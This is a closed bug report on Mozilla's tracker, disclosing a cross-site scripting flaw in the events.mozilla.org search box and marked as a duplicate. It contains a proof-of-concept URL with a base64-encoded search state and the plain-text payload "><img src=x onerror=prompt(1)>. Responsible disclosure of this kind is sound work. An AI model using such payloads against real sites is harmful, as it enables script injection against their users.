Closed
Bug 1367383
Opened 7 years ago
Closed 7 years ago
XSS at search box events.mozilla.org
Categories
(Websites :: Other, defect)
Websites
Other
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 1142658
People
(Reporter: depu1994, Unassigned)
Details
Attachments
(1 file)
245.99 KB,
image/png
|
Details |
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Steps to reproduce: Hi, There is xss in seach box. URL: https://events.mozilla.org/portal/events/#search/advanced/eyJkIjpbMjMsMSwxNF0sImUiOlswLDQsMl0sImYiOlswLDAsMF0sImciOlszMjAsIlwiPjxpbWcgc3JjPXggb25lcnJvcj1wcm9tcHQoMSk+IiwiXCI+PGltZyBzcmM9eCBvbmVycm9yPXByb21wdCgxKT4iXSwiaCI6WyIiLCIiLCIiXSwiaSI6WyIiLCIiLCIiXX0= Actual results: playlaod: "><img src=x onerror=prompt(1)> Expected results: Put playloads in search box. It will triggered xss pop up.
Updated•7 years ago
|
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Component: Untriaged → Other
Flags: sec-bounty-
Product: Core → Websites
Resolution: --- → DUPLICATE
Version: 50 Branch → unspecified
You need to log in
before you can comment on or make changes to this bug.
Description
•